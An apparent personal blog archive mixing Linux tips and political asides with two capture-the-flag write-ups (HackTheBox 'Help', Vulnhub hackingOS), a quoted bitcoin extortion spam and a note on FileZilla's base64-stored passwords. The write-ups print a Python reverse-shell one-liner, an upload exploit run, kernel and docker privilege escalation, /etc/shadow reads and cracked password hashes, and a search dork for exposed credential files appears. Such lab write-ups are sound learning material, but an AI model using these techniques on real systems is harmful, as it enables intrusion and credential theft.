Smart auto complete

It seems that sometimes smart bash completion is turned off by default so second commands and such as in apt install packagename are not auto completed. To activate it, in /etc/bash.bashrc file uncomment the following lines:

#if [ -f /etc/bash_completion ]; then
# . /etc/bash_completion

RTFM! Wallpaper

Made this for my work notebook, to remind myself to rtfm 😉


Also 1984 ist inzwischen echt der gemäßigte, sozialdemokratische Koalabär der Realität.

Manjaro 18.0.4 auf dem Thinkpad X1 Tablet Gen. 1

Ich wollte mein X1 Tablet schon verkaufen da ich nicht mehr so dringend ein Tablet brauche. Aber vorher habe ich spontan Manjaro darauf gestartet und nun gefällt es mir wieder sehr gut 🙂 So ohne Windows…

Manjaro 18.0.4 auf dem Thinkpad X1 Tablet Gen. 1, GIMP
Manjaro in GIMP auf dem Thinkpad x1 Tablet

Live läuft alles vielversprechend gut, Stift, Touchpad und Wifi laufen! Nach der (ersten) Installation taucht das erste Problem auf. Ich habe Manjaro verschlüsselt installiert und leider erkennt er seine selbst erstellte Verschlüsselte Partition nicht. Also nochmal unverschlüsselt installiert. Nun läuft es…

Als erstes erstmal geschaut ob ich den 5.2.4 Kernel benutzen kann, es geht auch, allerdings mit so vielen Freezes, dass es unbenutzbar ist. Also erstmal wieder den 4.19er aktiviert. Mit einigen Hindernissen, denn es startet kein Grub und ich konnte nicht, wie online zu lesen steht, den Kernel beim Boot auswählen. Die GUI war unbenutzbar wegen der Freezes, also musste ich den Kernel in der Konsole deinstallieren:

pacman -R linux52

Nach dem Reboot läuft wieder der 4.19er Kern.


Use DNS over HTTPS in Firefox

Firefox can now send your DNS Requests over DNS and your really should use that option. Your DNS Requests are normally send over clear-text UDP visible to your Provider and everyone who is able to intercept your internet traffic. This means almost everyone is able to see what pages you visit. DNS over HTTPS changes that by encrypting your DNS queries.

Go to about:preferences#general

Check Enable DNS over HTTPS

I will do some research on what DOH capable DNS to use and report back with it. Btw. this ridicolous twit of an association of UK ISP’s inspired me to encourage everyone to use it. Also it made me comment on twitter, first time for ages. Calling Mozilla an internet villain for protecting peoples privacy. WTF.

HackTheBox writeup of „Help“

my first writeup for a machine called: Help,

$ nmap -Pn –script vuln
Starting Nmap 7.70 ( ) at 2019-05-11 13:22 CEST
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for
Host is up (0.041s latency).
Not shown: 997 closed ports
22/tcp open ssh
80/tcp open http
| http-cookie-flags:
| /support/:
|_ httponly flag not set
|_http-csrf: Couldn’t find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn’t find any DOM based XSS.
| http-enum:
|_ /support/: Potentially interesting folder
|_http-stored-xss: Couldn’t find any stored XSS vulnerabilities.
3000/tcp open ppp fileupload through a helpdeskz installation

/*submit_ticket_controller.php – Line 141*
$filename = md5($_FILES[‚attachment‘][’name‘].time()).“.“.$ext;

files uploaded get get obfuscated similar to HackinOS (Vulnhub) md5 of the filname and current time.

unfortunately .php files arent allowed on the machine. too bad. tried nullbyte filenames cmd.gif^@.php etc. no luck. ah ok it seems gifs are not allowed

at least taught me how i could have improved my script for hackinOS. filedownload looks promising

ok as my colleauges from link protect suggested i tried again to upload a php file and not get confused by error messages. i tried, still no luck, but then i played around with the exploit script und looked at the original helpdeskz and realized that the exploit didnt add the proper upload directory and i had to point it myself…doh, it instantly worked:

$ python hackthebox/ ja.gif0x00.php
Helpdeskz v1.0.2 – Unauthenticated shell upload exploit


GIF89a; root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false syslog:x:104:108::/home/syslog:/bin/false _apt:x:105:65534::/nonexistent:/bin/false messagebus:x:106:110::/var/run/dbus:/bin/false uuidd:x:107:111::/run/uuidd:/bin/false help:x:1000:1000:help,,,:/home/help:/bin/bash sshd:x:108:65534::/var/run/sshd:/usr/sbin/nologin mysql:x:109:117:MySQL Server,,,:/nonexistent:/bin/false Debian-exim:x:110:118::/var/spool/exim4:/bin/false

i’ve got RCE 🙂

i tried a few reverse shells, a python one python -c ‚import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((„“,2323));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);[„/bin/sh“,“-i“]);‘

got shell 🙂

tty upgrade python -c ‚import pty; pty.spawn(„/bin/bash“)‘
python -c ‚import pty; pty.spawn(„/bin/dash“)‘

also help@help:/home/help$ whoami

user 🙂

enumerating i found
$ cat /var/www/html/support/includes/config.php
show databases;
show databases;
| Database |
| information_schema |
| mysql |
| performance_schema |
| support |
| sys |
5 rows in set (0.00 sec)

use support;

mysql> SELECT * FROM users;
SELECT * FROM users;
| id | salutation | fullname | email | password | timezone | status |
| 1 | 0 | helpme | | c3b3bd1eb5142e29adb0044b16ee4d402d06f9ca | Indian/Christmas | 1 |
| 53 | 0 | Foo Bar | foo@bar.nul | 439d32d3c8e4170db7c2bd3dce1ba29c0cec11b4 | NULL | 1 |
53 rows in set (0.00 sec)

| 1 | 0 | helpme | | c3b3bd1eb5142e29adb0044b16ee4d402d06f9ca | Indian/Christmas | 1 |

c3b3bd1eb5142e29adb0044b16ee4d402d06f9ca sha1 godhelpmeplz
5d3c93182bb20f07b994a7f617e99cff md5 godhelpmeplz

we got a passwd for the helpdeskz

with cat <<EOF <
script here

i could manage to get my enumeration script on the box without having a real tty. to remember! after enum, i started looking for priv esc exploits for the configuration i found some exploits for the kernel version.

Linux version 4.4.0-116-generic (buildd@lgw01-amd64-021) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.9) ) #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018

after trying a few i found this one working

$ gcc bx.c -o bx

[.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)
[.] ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **
[*] creating bpf map
[*] sneaking evil bpf past the verifier
[*] creating socketpair()
[*] attaching bpf backdoor to socket
[*] skbuff => ffff8800369add00
[*] Leaking sock struct from ffff88000622a400
[*] Sock->sk_rcvtimeo at offset 472
[*] Cred structure at ffff88003aa15680
[*] UID from cred structure: 1000, matches the current: 1000
[*] hammering cred structure at ffff88003aa15680
[*] credentials patched, launching shell…

# cat /root/root.txt
cat /root/root.txt

# whoami


Spam wave threatening Website Owners

It seems there is a massive spam campaign going on originating from this ip: and regarding to this guy also and

Spam comments get placed on wordpress websites, featuring a pretty threatening text, at least for people who have monetary interest in their websites.

Hey. Soon your hosting account and your domain will be blocked forever, and you will receive tens of thousands of negative feedback from angry people.

Pay me 0.5 BTC until June 1, 2019.
Otherwise, you will get the reputation of a malicious spammer, your site will be blocked for life and you will be sued for insulting believers. I guarantee this to you.

My bitcoin wallet:19ckouUP2E22aJR5BPFdf7jP2oNXR3bezL

Here is a list of what you get if you don’t follow my requirements:
+ abuse spamhouse for aggressive web spam
+ tens of thousands of negative reviews about you and your website from angry people for aggressive web and email spam
+ lifetime blocking of your hosting account for aggressive web and email spam
+ lifetime blocking of your domain for aggressive web and email spam
+ Thousands of angry complaints from angry people will come to your mail and messengers for sending you a lot of spam
+ complete destruction of your reputation and loss of clients forever
+ for a full recovery from the damage you need tens of thousands of dollars

All of the above will result in blocking your domain and hosting account for life. The price of your peace of mind is 0.5 BTC.

Do you want this?

If you do not want the above problems, then before June 1, 2019, you need to send me 0.5 BTC to my Bitcoin wallet: 19ckouUP2E22aJR5BPFdf7jP2oNXR3bezL

How do I do all this to get this result:
1. I will send messages to 33 000 000 sites with contact forms with offensive messages with the address of your site, that is, in this situation, you and the spammer and insult people.
And everyone will not care that it is not you.
2. I’ll send messages to 19,000,000 email addresses and very intrusive advertisements for making money and offer a free iPhone with your website address and your contact details.
And then send out abusive messages with the address of your site.
3. I will do aggressive spam on blogs, forums and other sites (in my database there are 35 978 370 sites and 315 900 sites from which you will definitely get a huge amount of abuse) of your site
After such spam, the spamhouse will turn its attention on you and after several abuses your host will be forced to block your account for life.
Your domain registrar will also block your domain permanently.

All of the above will result in blocking your domain and hosting account for life.
If you do not want to receive thousands of complaints from users and your hosting provider, then pay before June 1, 2019.
The price of your peace of mind is 0.5 BTC.
Otherwise, I will send your site through tens of millions of sites that will lead to the blocking of your site for life and you will lose everything and your reputation as well.
But get a reputation as a malicious spammer.

My bitcoin wallet:19ckouUP2E22aJR5BPFdf7jP2oNXR3bezL

A quick search shows that a lot of websites got those comments.

Seehofer -.-

Angriff auf WhatsApp & Co.: Seehofer will Messenger zur Entschlüsselung zwingen

heise online –

Alle bitte mal die CSU ganz dringend abwählen.

Aber ist ja nichts neues, seit 2001 sind die Menschenrechte auf dem absteigenden Ast. Wann bekommen wir eigentlich endlich ein Social Scoring System wie in China? Müssen sich die Dystopien in so rasantem Tempo realisieren?

Am Sonntag Liebe und Freiheit wählen bitte <3

filezilla stores passwords in (almost) plain text

When importing my sitemanager.xml from my windows filezilla to my linux box i discovered that the passwords in it are store in base64 encoding completely unencrypted. This is sucks, because i use a master password to, what i thought, encrypt my passwords with it.

        <Pass encoding="base64">base64 encoded password</Pass>

So what is the master password for? Etablishing a wrong sense of safety? doh. shows us that filezilla is doing it that way for years already.

inurl:“sitemanager.xml“ ext:xml -git

DON’T store your passwords in filezilla.

vulnhub hackingOS writeup,295/

running sparta gave me port 22 and 8000, on 8000 i found a defunct wordpress. which pointed to localhost, that could be fixed with locally assigning localhost to the vm’s network ip.

i also found that Handsome_Container was a valid wordpress username. i started bruteforcing it with burp suite.

nikto revealed some interesting infos:

– Nikto v2.1.6
+ Target IP:
+ Target Hostname:
+ Target Port: 8000
+ Start Time: 2019-05-01 14:55:20 (GMT2)
+ Server: Apache/2.4.25 (Debian)
+ Retrieved x-powered-by header: PHP/7.2.15
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Root page / redirects to:
+ No CGI Directories found (use ‚-C all‘ to force check all possible dirs)
+ Entry ‚/upload.php‘ in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ „robots.txt“ contains 2 entries which should be manually viewed.
+ Apache/2.4.25 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Uncommon header ‚link‘ found, with contents: ; rel=““
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /wp-content/plugins/hello.php: PHP error reveals file system path.
+ OSVDB-62684: /wp-content/plugins/hello.php: The WordPress hello.php plugin reveals a file system path
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ Cookie wordpress_test_cookie created without the httponly flag
+ /wp-login.php: WordPress login found
+ 7919 requests: 0 error(s) and 16 item(s) reported on remote host
+ End Time: 2019-05-01 14:56:56 (GMT2) (96 seconds)
+ 1 host(s) tested

the /upload.php is interesting, its an image upload function. i started uploading with php reverse shells infected png images. That didnt work out.

Warning: getimagesize(): PNG file corrupted by ASCII conversion in /var/www/html/upload.php on line 25

At some point i found the hint hidden in the html code <–—Hint –>
That revealed the upload.php’s code:

That makes it a lot easier. We can see that the file ist renamed to the md5 of the filename and a random number from 1-100.
The script checks the mime type of the uploaded file but no extension, allowed are gif and png mime types.

So i created a random png image with gimp and opened it with hex editor, put a a php reverse shell in it. upload wont work -.- after learning and experimenting i found a gif working like that:

cat cmd.php

now we get to launch the shell and for that we need to find the uploaded file, so i wrote a script to create the 100 possible hashes of cmd.phpXXX


import hashlib

textToEncode = input()
bisHundert = 1
toEncode = textToEncode+str(bisHundert)

while bisHundert<=100:
bisHundert += 1
toEncode = textToEncode+str(bisHundert)

$ python3 > cmdphphashes.txt
thomsane@anansi:~/python$ cat cmdphphashes.txt

now we can supply wfuzz with the payloads stored in the textfile.

$ sudo wfuzz -w python/cmdphphashes.txt –hc 404

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz’s documentation for more information.

* Wfuzz 2.3.4 – The Web Fuzzer *

Total requests: 100

ID Response Lines Word Chars Payload

000024: C=200 3 L 16 W 165 Ch „39b07a3be178f1249b64f60105360c4b“

Total time: 0.245449
Processed Requests: 100
Filtered Requests: 99
Requests/sec.: 407.4165

and it found our „picture“ at

and my listener received the shell 🙂 which i upgraded to a real tty with python -c ‚import pty; pty.spawn(„/bin/bash“)‘ and started looking for priv esc possibilities.

i found /usr/bin/tail to have SUID bit set and tried to:
$ tail -n 100 /root/flag
Life consists of details..

well, thats not a flag right? but no permission error either since cat: /root/flag: Permission denied

tail -c1G /etc/shadow

enumerating further i found $ cat /etc/init.d/
cat /etc/init.d/

while [ 1 ]
rm -rf /var/www/html/uploads/*.php
sleep 300

okay…that was the fuck keeping burp suite intruder from finding the file because of the speed throtteling in the free edition. -.-

cat wp-config.php

LOCK TABLES `host_ssh_cred` WRITE;
/*!40000 ALTER TABLE `host_ssh_cred` DISABLE KEYS */;
INSERT INTO `host_ssh_cred` VALUES (‚hummingbirdscyber‘,’e10adc3949ba59abbe56e057f20f883e‘);
/*!40000 ALTER TABLE `host_ssh_cred` ENABLE KEYS */;

INSERT INTO `wp_users` VALUES (1,’Handsome_Container‘,’$P$BXJ8ZmtYd5lHZOLPgTccLUhaQLxm0L0′,’handsome_container‘,’‘,“,’2019-02-23 15:49:54′,“,0,’Handsome_Container‘);

e10adc3949ba59abbe56e057f20f883e md5 of 123456

well, well, well…i was on a container before! i noticed when i looked in /var/www/html and only found an index.html. i was thinking so when i was looking on the mounts on the container…

[+] Current User

[+] Current User ID
uid=1000(hummingbirdscyber) gid=1000(hummingbirdscyber) groups=1000(hummingbirdscyber),4(adm),24(cdrom),30(dip),46(plugdev),113(lpadmin),128(sambashare),129(docker)

ok, we are in the docker group…so basically root already.

lets look what containers run

hummingbirdscyber@vulnvm:~$ docker ps
252fa8cb1646 ubuntu "/bin/bash" 2 months ago Up 2 days brave_edison
1afdd1f6b82c wordpress:latest "docker-entrypoint.s…" 2 months ago Up 2 days>80/tcp experimental_wordpress_1
81a93420fd22 mysql:5.7 "docker-entrypoint.s…" 2 months ago Up 2 days 3306/tcp, 33060/tcp experimental_db_1

since i run the vulnerable vm without internet access for security reasons, i used the ubuntu image which already exists to elevate my privileges

hummingbirdscyber@vulnvm:~$ docker run -v /:/hostOS -i -t ubuntu

now we run a a new container and the / filesystem of the main host is mounted to /hostOS

root@c50ed36b8d25:/hostOS/root# cat flag


                                 `+mMMMMMMd/           ./oso/-                           
                                  `/yNMMMMMMMMNo`   .`   +-                   
                                  .oyhMMMMMMMMMMN/.     o.                  
                                    `:+osysyhddhs`    `o`                  
                                     .:oyyhshMMMh.   .:                      
                                  `-//:. `:sshdh: `                         
                                      /+. .d`                           
                                    -/`  `y`                                  
                                  `:`   `/                                    
                                 `.     `

that was fun 🙂 <3